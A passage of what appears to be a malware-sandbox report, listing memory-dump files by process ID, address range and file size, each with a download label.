                                              Filesize

                                              1.0MB

                                              Download

                                            • memory/1984-709-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp

                                              Filesize

                                              1.0MB

                                              Download

                                            • memory/1984-704-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp

                                              Filesize

                                              1.0MB

                                              Download

                                            • memory/1984-714-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp

                                              Filesize

                                              1.0MB

                                              Download

                                            • memory/1984-712-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp

                                              Filesize

                                              1.0MB

                                              Download

                                            • memory/1984-718-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp

                                              Filesize

                                              1.0MB

                                              Download

                                            • memory/1984-716-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp

                                              Filesize

                                              1.0MB

                                              Download

                                            • memory/1984-710-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp

                                              Filesize

                                              1.0MB

                                              Download

                                            • memory/1984-690-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp

                                              Filesize

                                              1.0MB

                                              Download

                                            • memory/1984-700-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp

                                              Filesize

                                              1.0MB

                                              Download

                                            • memory/1984-698-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp

                                              Filesize

                                              1.0MB

                                              Download

                                            • memory/1984-696-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp

                                              Filesize

                                              1.0MB

                                              Download

                                            • memory/2024-635-0x000002562CE40000-0x000002562CE62000-memory.dmp

                                              Filesize

                                              136KB

                                              Download

                                            • memory/2172-3470-0x0000000000FC0000-0x000000000147A000-memory.dmp

                                              Filesize

                                              4.7MB

                                              Download

                                            • memory/2172-30267-0x0000000000640000-0x0000000000AEC000-memory.dmp

                                              Filesize

                                              4.7MB

                                              Download

                                            • memory/2172-32509-0x0000000000640000-0x0000000000AEC000-memory.dmp

                                              Filesize

                                              4.7MB

                                              Download

                                            • memory/2172-30274-0x0000000008BF0000-0x0000000008BFA000-memory.dmp

                                              Filesize

                                              40KB

                                              Download

                                            • memory/2172-30272-0x0000000000640000-0x0000000000AEC000-memory.dmp

                                              Filesize

                                              4.7MB

                                              Download

                                            • memory/2172-3467-0x0000000000FC0000-0x000000000147A000-memory.dmp

                                              Filesize

                                              4.7MB

                                              Download

                                            • memory/2172-30271-0x0000000000640000-0x0000000000AEC000-memory.dmp

                                              Filesize

                                              4.7MB

                                              Download

                                            • memory/2540-36183-0x0000000000400000-0x000000000040E000-memory.dmp

                                              Filesize

                                              56KB

                                              Download

                                            • memory/3196-34-0x0000000000230000-0x00000000006EA000-memory.dmp

                                              Filesize

                                              4.7MB

                                              Download

                                            • memory/3196-47-0x0000000000230000-0x00000000006EA000-memory.dmp

                                              Filesize

                                              4.7MB

                                              Download

                                            • memory/3212-30262-0x00000000086C0000-0x00000000086D2000-memory.dmp

                                              Filesize

                                              72KB

                                              Download

                                            • memory/3212-30270-0x0000000000190000-0x000000000063C000-memory.dmp

                                              Filesize

                                              4.7MB

                                              Download

                                            • memory/3212-30263-0x0000000008C20000-0x0000000008C5C000-memory.dmp

                                              Filesize

                                              240KB

                                              Download

                                            • memory/3212-30257-0x0000000000190000-0x000000000063C000-memory.dmp

                                              Filesize

                                              4.7MB

                                              Download

                                            • memory/3212-30260-0x0000000007940000-0x00000000079D2000-memory.dmp

                                              Filesize

                                              584KB

                                              Download

                                            • memory/3212-30259-0x0000000000190000-0x000000000063C000-memory.dmp

                                              Filesize

                                              4.7MB

                                              Download

                                            • memory/3212-30258-0x0000000000190000-0x000000000063C000-memory.dmp

                                              Filesize

                                              4.7MB

                                              Download

                                            • memory/3444-63-0x0000000000400000-0x000000000085E000-memory.dmp

                                              Filesize

                                              4.4MB

                                              Download

                                            • memory/3444-137-0x0000000000400000-0x000000000085E000-memory.dmp

                                              Filesize

                                              4.4MB

                                              Download

                                            • memory/3444-2623-0x0000000000400000-0x000000000085E000-memory.dmp

                                              Filesize

                                              4.4MB

                                              Download

                                            • memory/3444-647-0x0000000000400000-0x000000000085E000-memory.dmp

                                              Filesize

                                              4.4MB

                                              Download

                                            • memory/3444-204-0x0000000000400000-0x000000000085E000-memory.dmp

                                              Filesize

                                              4.4MB

                                              Download

                                            • memory/3556-17-0x00000000062A0000-0x00000000062BE000-memory.dmp

                                              Filesize

                                              120KB

                                              Download

                                            • memory/3556-18-0x00000000062F0000-0x000000000633C000-memory.dmp

                                              Filesize

                                              304KB

                                              Download

                                            • memory/3556-2-0x0000000004D10000-0x0000000004D46000-memory.dmp

                                              Filesize

                                              216KB

                                              Download

                                            • memory/3556-4-0x0000000005410000-0x0000000005432000-memory.dmp

                                              Filesize

                                              136KB

                                              Download

                                            • memory/3556-16-0x0000000005DF0000-0x0000000006144000-memory.dmp

                                              Filesize

                                              3.3MB

                                              Download

                                            • memory/3556-6-0x0000000005C80000-0x0000000005CE6000-memory.dmp

                                              Filesize

                                              408KB

                                              Download

                                            • memory/3556-20-0x00000000067F0000-0x000000000680A000-memory.dmp

                                              Filesize

                                              104KB

                                              Download

                                            • memory/3556-5-0x0000000005B20000-0x0000000005B86000-memory.dmp

                                              Filesize

                                              408KB

                                              Download

                                            • memory/3556-22-0x0000000007820000-0x00000000078B6000-memory.dmp

                                              Filesize

                                              600KB

                                              Download

                                            • memory/3556-3-0x0000000005480000-0x0000000005AA8000-memory.dmp

                                              Filesize

                                              6.2MB

                                              Download

                                            • memory/3556-23-0x00000000077B0000-0x00000000077D2000-memory.dmp

                                              Filesize

                                              136KB

                                              Download

                                            • memory/3556-24-0x0000000008630000-0x0000000008BD4000-memory.dmp

                                              Filesize

                                              5.6MB

                                              Download

                                            • memory/3556-19-0x0000000007A00000-0x000000000807A000-memory.dmp

                                              Filesize

                                              6.5MB

                                              Download

                                            • memory/4396-36245-0x0000000005600000-0x0000000005954000-memory.dmp

                                              Filesize

                                              3.3MB

                                              Download

                                            • memory/4396-36250-0x0000000005AC0000-0x0000000005B0C000-memory.dmp

                                              Filesize

                                              304KB

                                              Download

                                            • memory/4396-36677-0x0000000006F70000-0x0000000006FC6000-memory.dmp

                                              Filesize

                                              344KB

                                              Download

                                            • memory/4396-36676-0x0000000009900000-0x0000000009D96000-memory.dmp

                                              Filesize

                                              4.6MB

                                              Download

                                            • memory/4520-154-0x0000000000400000-0x0000000000463000-memory.dmp

                                              Filesize

                                              396KB

                                              Download

                                            • memory/4520-155-0x0000000000400000-0x0000000000463000-memory.dmp

                                              Filesize

                                              396KB

                                              Download

                                            • memory/5732-665-0x0000000000400000-0x0000000000463000-memory.dmp

                                              Filesize

                                              396KB

                                              Download

                                            • memory/5732-666-0x0000000000400000-0x0000000000463000-memory.dmp

                                              Filesize

                                              396KB

                                              Download

                                            • memory/6024-648-0x0000000000FC0000-0x000000000147A000-memory.dmp

                                              Filesize

                                              4.7MB

                                              Download

                                            • memory/6024-48-0x0000000000FC0000-0x000000000147A000-memory.dmp

                                              Filesize

                                              4.7MB

                                              Download

                                            • memory/6024-64-0x0000000000FC0000-0x000000000147A000-memory.dmp

                                              Filesize

                                              4.7MB

                                              Download

                                            • memory/6024-71-0x0000000000FC0000-0x000000000147A000-memory.dmp

                                              Filesize

                                              4.7MB

                                              Download

                                            • memory/6024-159-0x0000000000FC0000-0x000000000147A000-memory.dmp

                                              Filesize

                                              4.7MB

                                              Download

                                            • memory/6024-379-0x0000000000FC0000-0x000000000147A000-memory.dmp

                                              Filesize

                                              4.7MB

                                              Download

                                            • memory/7240-32526-0x0000000000980000-0x000000000140E000-memory.dmp

                                              Filesize

                                              10.6MB

                                              Download

                                            • memory/7240-32510-0x0000000000980000-0x000000000140E000-memory.dmp

                                              Filesize

                                              10.6MB

                                              Download

                                            • memory/8272-33302-0x0000000005260000-0x0000000005270000-memory.dmp

                                              Filesize

                                              64KB

                                              Download

                                            • memory/8272-36153-0x0000000009EA0000-0x0000000009EF2000-memory.dmp

                                              Filesize

                                              328KB

                                              Download

                                            • memory/8272-36185-0x000000006EEF0000-0x000000006F4D0000-memory.dmp

                                              Filesize

                                              5.9MB

                                              Download

                                            • memory/8272-35380-0x000000006EEF0000-0x000000006F4D0000-memory.dmp

                                              Filesize

                                              5.9MB

                                              Download

                                            • memory/8272-33250-0x00000000008E0000-0x0000000000ECC000-memory.dmp

                                              Filesize

                                              5.9MB

                                              Download

                                            • memory/8272-33265-0x000000006EEF0000-0x000000006F4D0000-memory.dmp

                                              Filesize

                                              5.9MB

                                              Download

                                            • memory/8272-33294-0x0000000008EA0000-0x0000000008F3C000-memory.dmp

                                              Filesize

                                              624KB

                                              Download

                                            • memory/8272-33295-0x0000000009340000-0x00000000093AA000-memory.dmp

                                              Filesize

                                              424KB

                                              Download

                                            • memory/9544-36170-0x000002414B2E0000-0x000002414B2F8000-memory.dmp

                                              Filesize

                                              96KB

                                              Download

                                            • memory/11920-36211-0x0000000007CA0000-0x0000000007CAA000-memory.dmp

                                              Filesize

                                              40KB

                                              Download

                                            • memory/11920-36216-0x0000000007F50000-0x0000000007F58000-memory.dmp

                                              Filesize

                                              32KB

                                              Download

                                            • memory/11920-36209-0x0000000007880000-0x000000000789E000-memory.dmp

                                              Filesize

                                              120KB

                                              Download

                                            • memory/11920-36212-0x0000000007E30000-0x0000000007E41000-memory.dmp

                                              Filesize

                                              68KB

                                              Download

                                            • memory/11920-36213-0x0000000007E60000-0x0000000007E6E000-memory.dmp

                                              Filesize

                                              56KB

                                              Download

                                            • memory/11920-36214-0x0000000007E70000-0x0000000007E84000-memory.dmp

                                              Filesize

                                              80KB

                                              Download

                                            • memory/11920-36215-0x0000000007F70000-0x0000000007F8A000-memory.dmp

                                              Filesize

                                              104KB

                                              Download

                                            • memory/11920-36210-0x0000000007AF0000-0x0000000007B93000-memory.dmp

                                              Filesize

                                              652KB

                                              Download

                                            • memory/11920-36195-0x0000000006570000-0x00000000068C4000-memory.dmp

                                              Filesize

                                              3.3MB

                                              Download

                                            • memory/11920-36196-0x0000000006950000-0x000000000699C000-memory.dmp

                                              Filesize

                                              304KB

                                              Download

                                            • memory/11920-36198-0x00000000078A0000-0x00000000078D2000-memory.dmp

                                              Filesize

                                              200KB

                                              Download

                                            • memory/11920-36199-0x000000006EE60000-0x000000006EEAC000-memory.dmp

                                              Filesize

                                              304KB

                                              Download

                                            • memory/12796-36225-0x0000000000FC0000-0x000000000147A000-memory.dmp

                                              Filesize

                                              4.7MB

                                              Download

                                            • memory/12796-36223-0x0000000000FC0000-0x000000000147A000-memory.dmp

                                              Filesize

                                              4.7MB

                                              Download